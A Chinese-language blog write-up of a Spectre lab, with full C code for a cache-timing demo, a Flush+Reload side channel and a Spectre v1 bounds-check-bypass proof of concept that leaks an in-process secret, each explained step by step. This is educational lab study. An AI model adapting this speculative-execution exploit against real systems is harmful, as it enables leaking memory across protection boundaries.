Spectre Lab

tags: `exploitation`

之前聽到 spectre 的漏洞時就想自己做做看，但是當時知道原理卻不知道到底如何實作，所以一直無法執行，去年找到一個網站提供一個 vm 和數個程式可以操作，決定研究一下具體如何實踐。

※ 以下的程式碼編譯指令： gcc -g <filename.c> -o <filename> -msse2

Cache Time

這個單純說明有無 cache 在 cpu 執行週期的差別：




























#include <emmintrin.h>
#include <x86intrin.h>
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>

/* Probe buffer: main() touches one byte in each of ten slots spaced 4096 bytes apart. */
uint8_t array[10*4096];

/*
 * Cache-timing demo.
 *
 * Writes one byte in each of the ten 4096-byte-spaced slots of array[],
 * flushes those lines with _mm_clflush(), writes slots 3 and 7 again, and
 * then prints the __rdtscp() cycle delta measured around a single read of
 * every slot.
 *
 * argc and argv are unused. Always returns 0.
 */
int main(int argc, const char **argv) {
  /* __rdtscp() takes an unsigned int *, so its output variable must be unsigned. */
  unsigned int junk = 0;
  register uint64_t time1, time2;
  /* volatile pointee: every *addr below is a real memory read. */
  volatile uint8_t *addr;
  int i;

  (void)argc;
  (void)argv;

  // Initialize the array
  for (i = 0; i < 10; i++) array[i*4096] = 1;
  // FLUSH the array from the CPU cache
  for (i = 0; i < 10; i++) _mm_clflush(&array[i*4096]);
  // Access some of the array items again after the flush
  array[3*4096] = 100;
  array[7*4096] = 200;
  for (i = 0; i < 10; i++) {
    addr = &array[i*4096];
    // Timed region: keep the load directly between the two timestamp reads.
    time1 = __rdtscp(&junk);   junk = *addr;
    time2 = __rdtscp(&junk) - time1;
    printf("Access time for array[%d*4096]: %d CPU cycles\n",i, (int)time2);
  }
  return 0;
}

重點介紹幾個地方：

register uint64_t time1, time2; (line 11)
register keyword 會提醒 compiler 以下的 variable 可以放置在 register 就好，不用塞到 stack 上，但是最終還是由 compiler 決定到底是放在 register 還是 stack 上。
volatile uint8_t * addr;
volatile keyword 提醒 compiler 不要因為最佳化而省略、合併或重排對該資料的存取；這裡 volatile 修飾的是 addr 所指向的資料，所以每次 *addr 都會真的去讀記憶體，而不是沿用暫存在 register 裡的舊值
_mm_clflush(const void *p)
根據 Intel 的說明文件，這個指令會讓包含位址 p 的 cache line 失效 (invalidate)，並將它從所有層級的 cache (L1 ~ L3) 中清除
__rdtscp(&junk);
這是組語指令，在開銷不大的情況下用來計算 cpu cycle ，通常前面和結尾還需要加上 cpuid 這條指令以防止 out-of-order 的出現(不過效能會掉很多，尤其是開在虛擬機裡面的時候)， rdtscp 會保證之前的 instruction 都已經完成再執行。

綜合以上，簡單講就是先 flush 掉跟 array[i*4096] 相關的 cache，然後再對 array[3*4096] 和 array[7*4096] 進行賦值，這樣這兩個地址所在的 cache line 就會被載入 cache (依據時間和空間相關性)，最後訪問 array[i*4096], 0 <= i < 10，然後用 rdtscp 比對 cycle

Image Not Showing Possible Reasons

The image file may be corrupted
The server hosting the image is unavailable
The image path is incorrect
The image format is not supported

Learn More →

FlushReload




















































#include <emmintrin.h>
#include <x86intrin.h>
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>

/* Probe array: 256 slots spaced 4096 bytes apart. */
uint8_t array[256*4096];
/* Destination for the load performed in victim(). */
int temp;
/* Value victim() uses to pick a probe slot; reloadSideChannel() tries to recover it. */
char secret = 94;
/* Access times at or below this many cycles are reported as cache hits (assumed value). */
#define CACHE_HIT_THRESHOLD (80)
/* Byte offset applied within each 4096-byte slot of array[]. */
#define DELTA 1024

/*
 * Reads the one probe slot selected by `secret` and stores the byte in
 * `temp`. The read is what later shows up as a fast access in
 * reloadSideChannel().
 */
void victim()
{
  const uint8_t *slot = &array[secret*4096 + DELTA];

  temp = *slot;
}
/*
 * Prepares the probe array: stores 1 into every probe slot, then flushes
 * each of those slots from the cache with _mm_clflush().
 */
void flushSideChannel()
{
  enum { SLOT_COUNT = 256, SLOT_STRIDE = 4096 };
  int slot;

  /* Store to each slot first; per the original author's note this brings
   * the pages into RAM so copy-on-write does not get in the way. */
  for (slot = 0; slot < SLOT_COUNT; slot++) {
    array[slot * SLOT_STRIDE + DELTA] = 1;
  }

  /* Now evict every probe slot from the cache. */
  for (slot = 0; slot < SLOT_COUNT; slot++) {
    _mm_clflush(&array[slot * SLOT_STRIDE + DELTA]);
  }
}

/*
 * Times one read of every probe slot array[i*4096 + DELTA], i = 0..255,
 * using __rdtscp() before and after the load. Any slot whose read takes at
 * most CACHE_HIT_THRESHOLD cycles is reported on stdout as cached, and its
 * index i is printed as the recovered secret.
 */
void reloadSideChannel()
{
  /* __rdtscp() takes an unsigned int *, so its output variable must be unsigned. */
  unsigned int junk = 0;
  register uint64_t time1, time2;
  /* volatile pointee: every *addr below is a real memory read. */
  volatile uint8_t *addr;
  int i;

  for (i = 0; i < 256; i++) {
    addr = &array[i*4096 + DELTA];
    /* Timed region: keep the load directly between the two timestamp reads. */
    time1 = __rdtscp(&junk);
    junk = *addr;
    time2 = __rdtscp(&junk) - time1;
    if (time2 <= CACHE_HIT_THRESHOLD) {
      printf("array[%d*4096 + %d] is in cache.\n", i, DELTA);
      printf("The Secret = %d.\n",i);
    }
  }
}

/*
 * Flush+Reload driver: flush the probe array, let the victim touch one
 * slot, then time every slot to find which one was touched.
 * argc and argv are unused. Always returns 0.
 */
int main(int argc, const char **argv)
{
  (void)argc;
  (void)argv;

  flushSideChannel();   /* 1. evict every probe slot */
  victim();             /* 2. victim reads the slot indexed by secret */
  reloadSideChannel();  /* 3. time all slots and report the fast ones */

  return 0;
}

Flush+Reload 比較複雜一點，但還是一個一個慢慢看：

#define CACHE_HIT_THRESHOLD (80)
這個根據下面的 code 應該是用來比對資料是否存在於 cache 的基準，也就是說超過 80 cycle 的就不算在 cache 內

不過我不確定這標準從何而來就是了…

char secret = 94;
secret 是拿來當作找尋的目標，若 array[i * 4096 + DELTA] 在 80 cycle 以內就找到的話，那代表 i 就是在 victim() 內放入 cache 的 secret 。




/* Reads the probe slot selected by `secret` into `temp`. */
void victim()
{
  temp = array[secret*4096 + DELTA];
}

綜合以上，可以看成：

先賦值再 flush 掉 cache
在 victim() 內將 array[secret * 4096 + DELTA] 的值放入 cache
reloadSideChannel() 去訪問 array[i * 4096 + DELTA] 後比對花費 cycle ，若有時間小於 80 cycle 勢必之前存在於 cache 內，那在 cache 被 flush 過的情況下也就只有 secret 這個 index 有在 victim() 被 access ，所以 cycle 特別小

這個實驗不是每次都成功，不知道哪些 process 還是什麼的會把 cache 洗掉 = =

Spectre Attack

這邊又比上一個更難…，花了點時間終於弄懂













































































#include <emmintrin.h>
#include <x86intrin.h>
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>

/* Bound checked by restrictedAccess(); matches the number of entries in buffer[]. */
unsigned int buffer_size = 10;
/* Data that restrictedAccess() is allowed to return. */
uint8_t buffer[10] = {0,1,2,3,4,5,6,7,8,9}; 
/* Not referenced by the other code visible in this program. */
uint8_t temp = 0;
/* String the attack tries to read; main() passes its offset from buffer[] to spectreAttack(). */
char *secret = "Some Secret Value";   
/* Probe array: 256 slots spaced 4096 bytes apart. */
uint8_t array[256*4096];

/* Access times at or below this many cycles are reported as cache hits (assumed value). */
#define CACHE_HIT_THRESHOLD (80)
/* Byte offset applied within each 4096-byte slot of array[]. */
#define DELTA 1024

// Sandbox function: bounds-checked read of buffer[].
// Returns buffer[x] when x < buffer_size, otherwise 0.
// NOTE(review): the demo relies on this check compiling to a conditional
// branch, so the if/else shape is left as written.
uint8_t restrictedAccess(size_t x)
{
  if (x < buffer_size) {
     return buffer[x];
  } else {
     return 0;
  } 
}

/*
 * Prepares the probe array: stores 1 into every probe slot, then flushes
 * each of those slots from the cache with _mm_clflush().
 */
void flushSideChannel()
{
  enum { SLOT_COUNT = 256, SLOT_STRIDE = 4096 };
  int slot;

  /* Store to each slot first; per the original author's note this brings
   * the pages into RAM so copy-on-write does not get in the way. */
  for (slot = 0; slot < SLOT_COUNT; slot++) {
    array[slot * SLOT_STRIDE + DELTA] = 1;
  }

  /* Now evict every probe slot from the cache. */
  for (slot = 0; slot < SLOT_COUNT; slot++) {
    _mm_clflush(&array[slot * SLOT_STRIDE + DELTA]);
  }
}

/*
 * Times one read of every probe slot array[i*4096 + DELTA], i = 0..255,
 * using __rdtscp() before and after the load. Any slot whose read takes at
 * most CACHE_HIT_THRESHOLD cycles is reported on stdout as cached, and its
 * index i is printed as the recovered secret.
 */
void reloadSideChannel()
{
  /* __rdtscp() takes an unsigned int *, so its output variable must be unsigned. */
  unsigned int junk = 0;
  register uint64_t time1, time2;
  /* volatile pointee: every *addr below is a real memory read. */
  volatile uint8_t *addr;
  int i;

  for (i = 0; i < 256; i++) {
    addr = &array[i*4096 + DELTA];
    /* Timed region: keep the load directly between the two timestamp reads. */
    time1 = __rdtscp(&junk);
    junk = *addr;
    time2 = __rdtscp(&junk) - time1;
    if (time2 <= CACHE_HIT_THRESHOLD) {
      printf("array[%d*4096 + %d] is in cache.\n", i, DELTA);
      printf("The Secret = %d.\n",i);
    }
  }
}
/*
 * Runs one attempt of the bounds-check-bypass demo.
 *
 * larger_x is passed to restrictedAccess() as an index; main() supplies the
 * distance from buffer[] to the secret string, which is outside buffer[].
 * The function first calls restrictedAccess() with in-range indices, then
 * flushes buffer_size and the probe slots, and finally calls
 * restrictedAccess(larger_x) and touches the probe slot selected by the
 * returned byte.
 */
void spectreAttack(size_t larger_x)
{
  int i;
  uint8_t s;
  volatile int z;
  // Train the CPU to take the true branch inside restrictedAccess():
  // every index 0..9 passes the x < buffer_size check.
  for (i = 0; i < 10; i++) { 
   // Evict buffer_size from the cache before each call.
   _mm_clflush(&buffer_size);
   restrictedAccess(i); 
  }
  // Flush buffer_size and array[] from the cache.
  _mm_clflush(&buffer_size);
  for (i = 0; i < 256; i++)  { _mm_clflush(&array[i*4096 + DELTA]); }
  // Short busy-wait; z is volatile so the empty loop is not removed.
  // Presumably gives the flushes time to complete -- TODO confirm.
  for (z = 0; z < 100; z++) { }
  // Call restrictedAccess() with the out-of-range index. Architecturally the
  // check fails and 0 is returned; the attack relies on the CPU speculatively
  // executing the in-range path before the check resolves (the original
  // comment called this out-of-order execution).
  s = restrictedAccess(larger_x);  
  // Touch the probe slot selected by s. reloadSideChannel() only measures
  // access time, so the access matters here, not the value added.
  array[s*4096 + DELTA] += 88;  
}

/*
 * Spectre demo driver: prepare the probe array, compute how far the secret
 * string lies from buffer[], run one attack attempt with that distance as
 * the index, then time the probe slots. Always returns 0.
 */
int main() {
  flushSideChannel();
  /* Distance in bytes from buffer[] to the secret string. The two are
   * unrelated objects, so subtracting the pointers directly is undefined
   * behaviour; subtract their integer addresses instead. Unsigned
   * wrap-around gives the same value the index arithmetic needs even when
   * the secret sits below buffer[] in memory. */
  size_t larger_x = (size_t)((uintptr_t)secret - (uintptr_t)buffer);
  spectreAttack(larger_x);
  reloadSideChannel();
  return (0);
}

一樣快速講重點：

uint8_t buffer[10] = {0,1,2,3,4,5,6,7,8,9};
視為可以合法存取的範圍
char *secret = "Some Secret Value";
不能存取的範圍，但是透過 Spectre Attack 可以讀到裡面的內容
uint8_t array[256*4096];
用來 side channel attack 的陣列








/* Bounds-checked read: returns buffer[x] when x < buffer_size, otherwise 0. */
uint8_t restrictedAccess(size_t x)
{
  if (x < buffer_size) {
     return buffer[x];
  } else {
     return 0;
  } 
}

這個 function 模擬有邊界檢查的受限存取：x 在範圍內才回傳 buffer[x]，否則回傳 0。branch predictor 會依據之前的執行結果先猜測走某一條分支並提前執行，而提前執行時存取到的資料會留在 cache 內，等等會看到具體用法





  // Train the CPU to take the true branch inside restrictedAccess():
  // every index 0..9 passes the x < buffer_size check.
  for (i = 0; i < 10; i++) { 
   // Evict buffer_size from the cache before each call.
   _mm_clflush(&buffer_size);
   restrictedAccess(i); 
  }

根據註解，這是用來「訓練」 CPU 的 branch predictor 讓其判斷說該 function 大多數的結果都是 return buffer[x]; 而先執行，等出錯再 roll back




  // Short busy-wait; z is declared volatile in spectreAttack().
  for (z = 0; z < 100; z++) { }
  // Call restrictedAccess() with the out-of-range index. Architecturally it
  // returns 0; the attack relies on the in-range path being executed
  // speculatively first (the original comment said "out-of-order execution").
  s = restrictedAccess(larger_x);  
  // Touch the probe slot selected by s.
  array[s*4096 + DELTA] += 88;

將 secret 相對於 buffer 的偏移當作參數傳給 restrictedAccess()，因為之前訓練的關係，branch predictor 會先猜測走 return buffer[x] 這條分支，CPU 於是推測執行 (speculative execution)，並透過 array[buffer[x]*4096 + DELTA] 把對應的 cache line 載入 cache。之後 CPU 發現預測錯誤而 rollback，restrictedAccess() 實際回傳 0，所以真正被存取的是 array[0*4096 + DELTA]，但 array[buffer[x]*4096 + DELTA] 依然存在於 cache 中。

有了上面的解釋就清楚了：

flush 掉 cache 避免失真
計算出 secret 到 buffer 的 offset
進入 Spectre Attack 範疇
1. 用 restrictedAccess 訓練 branch predictor 讓其偏向 return buffer[x]
2. 將 offset 丟到 restrictedAccess 中， branch predictor 因為之前的結果會先 return buffer[x]
3. 用得到的結果去訪問相關地址
4. CPU 發現執行錯了， rollback 並修正，但是 cache 沒有洗掉
計算訪問 array[i*4096 + DELTA] 的時間，看哪個 cycle 小於 80 ，則判斷說該地址的值之前存在於 cache 中

不過上述的 code 感覺穩定性不是很高…，要試不少次才成功：

要找下一個還要加 1 然後繼續刷…

Spectre Lab

tags: exploitation

Cache Time

FlushReload

Spectre Attack

Read more

C 語言黑魔法

惡意代碼分析

debug process hanging when stat a disconnected nfs server

Introduction to Hardware Efficiency in Cpp

tags: `exploitation`